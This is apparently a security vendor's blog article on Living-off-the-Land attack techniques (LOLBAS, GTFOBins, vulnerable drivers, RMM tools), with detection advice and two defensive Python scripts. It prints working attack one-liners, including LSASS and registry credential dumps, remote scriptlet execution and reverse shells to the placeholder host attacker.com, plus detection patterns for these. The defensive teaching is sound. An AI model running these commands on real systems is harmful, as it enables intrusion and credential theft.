
The Living off the Land Family: how to detect and mitigate
25.09.2025

Alexey Balandin, Security Vision


This article reviews a whole class of attack methods and techniques aimed at masking an attacker's activity and bypassing existing protection and detection mechanisms. The class is quite old and is called Living Off the Land; attackers have used it actively over the past few decades, and today almost no APT attack is carried out without these techniques. They have gained enormous popularity among attackers primarily because, by their nature, they allow the attacker to stay below the SOC radar. These techniques rely on existing OS mechanisms and trusted, unsuspicious tools for covert code execution, lateral movement, remote monitoring, data collection, privilege escalation and so on. The article also discusses ways to detect and counter this class of techniques.


The Living Off the Land family has grown so much in recent years that a separate project, LOLOL (Living Off the Living Off the Land), was created to catalogue all of its subclasses. Below we look at the subclasses that we consider the most popular and relevant: LOLBAS, GTFOBins, BYOVD and RMM.


LOLBAS


This category includes executables, scripts and libraries that are signed by Microsoft or another reputable vendor, or are native to Windows, and that have functionality which can be abused. Such functionality includes:

 ·  File Execution

1) pcalua.exe -a file.exe
2) rundll32.exe \\servername\C$\Windows\Temp\file.dll,EntryPoint
3) rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.example.org/file.ext")
4) regsvr32.exe /s /n /u /i:https://www.example.org/file.sct scrobj.dll
5) mshta.exe file.hta
6) mshta.exe javascript:a=GetObject("script:https://www.example.org/file.sct").Exec();close();
7) InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
8) regasm.exe file.dll
9) regsvcs.exe file.dll
10) wmic.exe process call create "cmd /c c:\windows\system32\calc.exe"

 

 ·  Code compilation

1) csc.exe -out:file.exe file.cs
2) ilasm.exe C:\Windows\Temp\file.txt /exe
3) jsc.exe /t:library file.js
4) vbc.exe /target:exe C:\Windows\Temp\file.vb


 ·  File operations (downloading, uploading, copying files)

1) bitsadmin /create 1 & bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
2) certoc.exe -GetCACAPS https://www.example.org/file.ps1
3) type \\servername\C$\Windows\Temp\file.ext > C:\Windows\Temp\file.ext
4) cmdl32 /vpn /lan %cd%\config
5) DataSvcUtil /out:C:\Windows\Temp\file.ext /uri:https://www.example.org/file.ext
6) finger user@example.host.com | more +2 | cmd
7) makecab \\servername\C$\Windows\Temp\file.exe C:\Windows\Temp\file.cab


 ·  Adding to startup (persistence)

1) pnputil.exe -i -a C:\Windows\Temp\file.inf
2) Update.exe --createShortcut=file.exe -l=Startup


 ·  Bypassing UAC

1) ComputerDefaults.exe
2) eventvwr.exe


 ·  Compromise of credentials

1) cmdkey /list
2) reg save HKLM\SECURITY C:\Windows\Temp\file.1.bak && reg save HKLM\SYSTEM C:\Windows\Temp\file.2.bak && reg save HKLM\SAM C:\Windows\Temp\file.3.bak
3) findstr /S /I cpassword \\sysvol\policies\*.xml


 ·  Dumping process memory

1) rdrleakdiag.exe /p 832 /o C:\Windows\Temp\folder /fullmemdmp /wait 1
2) TTTracer.exe -dumpFull -attach 1234
3) rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full


 ·  Bypassing application whitelisting

1) bginfo.exe file.bgi /popup /nolicprompt
2) regsvcs.exe file.dll
3) cmstp.exe /ni /s https://www.example.org/file.inf
4) InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
5) msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\Windows\Temp\file.xml /skip TRUE
6) regasm.exe file.dll
7) regsvr32.exe /s /u /i:file.sct scrobj.dll
8) InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
9) msbuild.exe Msbuild.csproj
10) mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();
11) Presentationhost.exe file:///IPAddressOrDomainName/Evil.xbap


Within this list, special attention should be paid to regasm.exe, regsvr32.exe, InstallUtil.exe, msbuild.exe, mshta.exe and Presentationhost.exe, because they can be used to bypass AppLocker configured with its default rules, which is quite common in corporate networks.


list of bypasses of AppLocker default rules

 ·  The DLL sideloading / hijacking technique also belongs to the LOLBAS category; it is difficult to detect and is widely used in APT attacks to bypass antivirus/EDR and application whitelisting. One of the most destructive uses of this technique was the REvil ransomware attack on the MSP Kaseya in 2021, in which a trusted Windows Defender executable, MsMpEng.exe, was used to load and execute a malicious library.


GTFOBins


This category includes trusted, native Unix executables whose functionality can be abused for the following purposes:


 ·  Launching an interactive command shell

1) busybox sh
2) find . -exec /bin/sh \; -quit
3) gcc -wrapper /bin/sh,-s .
4) nmap --interactive
nmap> !sh
5) perl -e 'exec "/bin/sh";'
6) export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
7) python -c 'import os; os.system("/bin/sh")'


 ·  Bind shell

1) nc -l -p 12345 -e /bin/sh
2) socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
3) socket -svp '/bin/sh -i' 12345


 ·  Reverse shell

1) export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
2) export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
3) export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
4) export RHOST=attacker.com
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
5) export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


BYOVD


This category covers techniques that exploit vulnerabilities in drivers. Because drivers run at the lowest and most privileged level of the OS (ring 0), they have direct access to the processor, memory, I/O devices and so on. Consequently, executing code at this level can have extremely destructive consequences, from privilege escalation and theft of authentication data to disabling OS security features and hiding malicious activity.


In practice, vulnerable drivers are most often used to disable security tools (antivirus, EDR) that themselves run at the OS kernel level and have self-protection, so that they cannot be disabled from ring 3 (user mode). This is achieved by terminating the security tool's processes, removing its registered kernel callbacks (notification routines), closing its process handles, disabling the PPL (Protected Process Light) mechanism, turning off driver signature enforcement, and so on. A further problem is that many legitimate tools used for diagnosing OS problems and investigating incidents ship with vulnerable drivers whose functionality can be turned to malicious ends; popular examples are Process Explorer, Process Hacker and GMER. At the moment the regularly updated LOLDrivers (Living Off The Land Drivers) project lists more than 700 vulnerable drivers. A prerequisite for this technique (installing a vulnerable driver) is administrator rights and a UAC bypass, which nevertheless does not reduce its popularity, including among ransomware (the RobbinHood ransomware campaign, the BlackByte ransomware campaign, the signed AV-killer malware closely related to BURNTCIGAR, and multiple incidents involving AuKill).


BYOVD has been and remains so popular that ready-made toolkits for disabling the best-known EDRs can be bought on the black market. An example is Terminator, sold by criminals for $3,000.


RMM


After gaining initial access and establishing a foothold on compromised hosts, an attacker needs to maintain remote control while staying unnoticed for as long as possible. Remote Monitoring and Management (RMM) utilities are widely used for this; most of them are legitimate software carrying the vendor's signature. Their simplicity and convenience make them popular with system administrators, which plays into attackers' hands and lets them stay below the SOC radar for a long time. The most commonly used are PsExec, Ammyy Admin, AnyDesk, TeamViewer and DameWare.


Detection and prevention


1. Regularly replenish and update your SIEM's correlation rule base with expertise drawn from the Sigma rules, Elastic Security and MITRE CAR projects, as well as from the threat intelligence reports of research groups:
https://thedfirreport.com/
https://www.welivesecurity.com/
https://research.checkpoint.com/
https://unit42.paloaltonetworks.com/
https://www.group-ib.com/blog/
https://bi.zone/expertise/blog/
https://securelist.ru/


When developing correlation rules for our SIEM/EDR, we at Security Vision actively use the expertise from the sources presented above.


2. Use EDR-class solutions, as well as free tools: Sysmon, Wazuh, Osquery, Velociraptor.

It is recommended to use sysmon-modular as the Sysmon configuration.


3. Use UEBA-class solutions, which identify anomalies and deviations from the established baseline profile of a user's or host's behaviour. We use this approach in our Security Vision UEBA product; it has proven itself well in practice and lets us detect activity that is hard to cover with SIEM correlation rules because of the high false-positive rate (for example, PowerShell running on an accountant's workstation, or a lawyer's workstation accessing GitHub).


4. Apply the principle of least privilege. Do not grant users local administrator/root rights on their workstations unless this is required by the employee's job duties.


5. To detect and prevent BYOVD, use Sysmon with a configuration that blocks the creation of known vulnerable driver files by file hash.


6. When hunting for LOLBAS traces on endpoints, the host indicators are the so-called Evidence of Execution artifacts (Prefetch, AmCache, AppCompatCache, ShimCache, etc.), the Windows Security log events Event ID 4688 (Process Creation) and Event IDs 5156 and 5158 (Windows Firewall), and Sysmon Event ID 1 (Process Creation). A useful network indicator is the User-Agent: "Microsoft-CryptoAPI" (certutil.exe) and "Microsoft BITS" (bitsadmin.exe).
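As an added example (not code from the article or from Security Vision), the following Python script applies the host indicators from items 5 and 6 to constructed Sysmon records: Event ID 1 (Process Creation) command lines are matched against patterns drawn from the LOLBAS list above, and Event ID 6 (Driver loaded) records are checked against a hash blocklist in the style of the LOLDrivers project, complementing the file-creation blocking in item 5 with detection of drivers that actually got loaded. All sample events, user names, PIDs and the blocklist hash are constructed placeholders; the rule names and the user-writable-path heuristic are this example's own choices, not part of Sysmon or of any published rule set.

```python
import re

# Constructed sample records in the flattened EventData form a SIEM or EDR agent
# typically produces from Sysmon. Hosts, users, PIDs and hashes are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:https://www.example.org/file.sct scrobj.dll",
     "User": r"CORP\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll MiniDump 712 dump.bin full",
     "User": r"CORP\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Windows\Temp\file.3.bak",
     "User": r"CORP\jdoe"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Hashes": "SHA256=" + "11" * 32, "Signed": "true"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\drv.sys",
     "Hashes": "MD5=" + "ab" * 16 + ",SHA256=" + "0123456789abcdef" * 4, "Signed": "true"},
]

# Placeholder for a blocklist built from the LOLDrivers project; the hash below is a
# constructed value, not a real driver hash. Sysmon must be configured to record
# SHA256 (HashAlgorithms) for this lookup to match anything.
VULNERABLE_DRIVER_HASHES = {"SHA256": {"0123456789abcdef" * 4}}

# Command-line patterns taken from the LOLBAS examples listed in the article.
LOLBAS_RULES = [
    ("rundll32 javascript: execution", r"rundll32(\.exe)?\s+javascript:"),
    ("regsvr32 remote scriptlet execution", r"regsvr32.*/i:https?://.*scrobj\.dll"),
    ("mshta inline script or URL", r"mshta(\.exe)?\s+(javascript:|vbscript:|https?://)"),
    ("LSASS dump via comsvcs MiniDump", r"comsvcs\.dll[ ,]+MiniDump"),
    ("registry hive dump (SAM/SYSTEM/SECURITY)", r"reg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)"),
    ("BITS download job", r"bitsadmin.*/addfile.*https?://"),
    ("GPP cpassword search in SYSVOL", r"findstr.*cpassword.*sysvol"),
    ("certoc download", r"certoc(\.exe)?.*-GetCACAPS\s+https?://"),
]
COMPILED_RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in LOLBAS_RULES]


def check_process_create(event):
    """Return the names of LOLBAS rules matching an Event ID 1 / 4688 command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in COMPILED_RULES if rx.search(cmd)]


def parse_hashes(field):
    """Split Sysmon's 'ALG=hex,ALG=hex,...' Hashes field into {ALG: hex_lowercase}."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            alg, value = part.split("=", 1)
            out[alg.strip().upper()] = value.strip().lower()
    return out


def check_driver_load(event, blocklist=VULNERABLE_DRIVER_HASHES):
    """Return findings for a Sysmon Event ID 6 (Driver loaded) record."""
    findings = []
    for alg, value in parse_hashes(event.get("Hashes", "")).items():
        if value in blocklist.get(alg, set()):
            findings.append(f"known vulnerable driver hash ({alg})")
            break
    if event.get("Signed", "").lower() != "true":
        findings.append("unsigned driver")
    path = event.get("ImageLoaded", "").lower()
    # Heuristic (this example's own): legitimate drivers live under the system
    # driver store, not in temp or profile directories where a dropper writes them.
    if "\\temp\\" in path or "\\users\\" in path:
        findings.append("driver loaded from user-writable path")
    return findings


def triage(events, blocklist=VULNERABLE_DRIVER_HASHES):
    """Run the per-event checks and return (EventID, finding, image) tuples."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            names = check_process_create(ev)
        elif ev["EventID"] == 6:
            names = check_driver_load(ev, blocklist)
        else:
            names = []
        image = ev.get("Image") or ev.get("ImageLoaded", "")
        alerts.extend((ev["EventID"], name, image) for name in names)
    return alerts


if __name__ == "__main__":
    for event_id, finding, image in triage(SAMPLE_EVENTS):
        print(f"[Sysmon {event_id}] {finding}: {image}")
```

In production these patterns belong in the SIEM as Sigma rules rather than in a script; the point here is to show what the command lines from the LOLBAS list look like once they reach Event ID 1 / 4688 and how the Hashes field of Event ID 6 is parsed before a LOLDrivers lookup. Plain command-line matching is easy to evade with obfuscation, so it should be combined with parent-child process context and the UEBA approach from item 3.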


7. When detecting LOLBAS activity at the network level, in addition to the User-Agent values mentioned above, pay attention to telemetry for protocols such as LDAP, RPC, SMB and WMI. NTA-class solutions, or the free Malcolm/Zeek, handle this task well (we wrote about their use in incident investigation in a separate article).


8. Where possible, block LOLBAS utilities with AppLocker, WDAC or another Application Whitelisting solution if they are not required by business workflows. The link below gives the full list of LOLBAS utilities that Microsoft recommends blocking.


9. Use SELinux or AppArmor to block the launch of GTFOBins utilities on Linux hosts.


10. LOLBAS also includes PowerShell together with its numerous cmdlets and modules (including the Active Directory module, frequently used by attackers) for collecting network/domain data, executing code, moving laterally and so on. To detect this activity, enable PowerShell logging: module logging (Event ID 4103), script block logging (Event ID 4104) and transcription logging. It is also recommended to enable Constrained Language Mode to prevent unsafe PowerShell cmdlets and scripts from running.
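As an added example (not code from the article or from Security Vision), the Python script below scans constructed Event ID 4104 script block records for the activity named in this item: download cradles, encoded payloads and domain enumeration with the ActiveDirectory module. It also handles a detail of 4104 that trips up naive rules: PowerShell logs a long script block as several fragments that share a ScriptBlockId and carry MessageNumber/MessageTotal, so a pattern that straddles a fragment boundary is only found after reassembly. The sample records, paths and URLs are constructed; the rule patterns are this example's own, not from any published rule set.

```python
import re
from collections import defaultdict

# Constructed Event ID 4104 records (Microsoft-Windows-PowerShell/Operational),
# reduced to the EventData fields used here. Block "b2" arrives as two fragments,
# out of order, with the download cradle split across them.
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 1, "Path": r"C:\Scripts\cleanup.ps1",
     "ScriptBlockText": r"Get-ChildItem C:\Reports | Where-Object Length -gt 1MB"},
    {"ScriptBlockId": "b2", "MessageNumber": 2, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "String('https://www.example.org/file.ps1') | Invoke-Expression"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "$c = New-Object Net.WebClient; $c.Download"},
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 1, "Path": "",
     "ScriptBlockText": "Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties OperatingSystem"},
]

# Patterns for the activity the article names (this example's own rules).
RULES = [
    ("download cradle piped to Invoke-Expression",
     r"(Net\.WebClient.*\.Download(String|File)|Invoke-WebRequest|\biwr\b).*\b(iex|Invoke-Expression)\b"),
    ("encoded command or base64 payload", r"(-e(nc|ncodedcommand)?\b|FromBase64String)"),
    ("AD enumeration with ActiveDirectory module",
     r"\bGet-AD(User|Computer|Group|GroupMember|DomainController)\b.*-Filter\s+\*"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]


def reassemble(events):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order.
    Incomplete blocks (missing fragments) are kept and flagged, not dropped."""
    fragments = defaultdict(dict)
    meta = {}
    for ev in events:
        sid = ev["ScriptBlockId"]
        fragments[sid][ev["MessageNumber"]] = ev["ScriptBlockText"]
        meta[sid] = (ev["MessageTotal"], ev.get("Path", ""))
    blocks = {}
    for sid, parts in fragments.items():
        total, path = meta[sid]
        blocks[sid] = {
            "text": "".join(parts[n] for n in sorted(parts)),
            "complete": len(parts) == total,
            "path": path,
        }
    return blocks


def scan_script_blocks(events):
    """Scan reassembled blocks; returns sorted (ScriptBlockId, rule, complete) tuples."""
    hits = []
    for sid, block in reassemble(events).items():
        for name, rx in COMPILED:
            if rx.search(block["text"]):
                hits.append((sid, name, block["complete"]))
    return sorted(hits)


def scan_fragments_only(events):
    """Naive variant that matches each fragment on its own, for comparison."""
    hits = set()
    for ev in events:
        for name, rx in COMPILED:
            if rx.search(ev["ScriptBlockText"]):
                hits.add((ev["ScriptBlockId"], name))
    return sorted(hits)


if __name__ == "__main__":
    print("reassembled:  ", scan_script_blocks(SAMPLE_4104))
    print("per-fragment: ", scan_fragments_only(SAMPLE_4104))
```

Running it shows the cradle in block b2 is found only by the reassembling scanner; the per-fragment variant reports just the AD enumeration in b3. An empty Path field, as in b2 and b3, means the block was not loaded from a script file on disk (typed interactively or passed on the command line), which is itself worth weighting in a rule.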


11. When investigating incidents involving DLL sideloading / hijacking, which are among the hardest techniques in the LOLBAS class to detect, their indicators can be found with the specialised scanners DLLHound and Crassus.


12. The scanners Chainsaw, Zircolite and Hayabusa give good results in detecting LOL technique indicators and building an attack timeline on a single host using Sigma rules, especially when there are no indicators on the SIEM side or the SIEM produces too many false positives.


Conclusion


Because of their effectiveness and simplicity, Living Off the Land techniques will remain popular with attackers for a long time to come. To detect and counter them it is necessary, on the one hand, to regularly replenish the knowledge base on new attack methods so that they can be detected in time and, on the other, to observe the principle of least privilege on user workstations and, where possible, block LOL tools with Application Whitelisting.
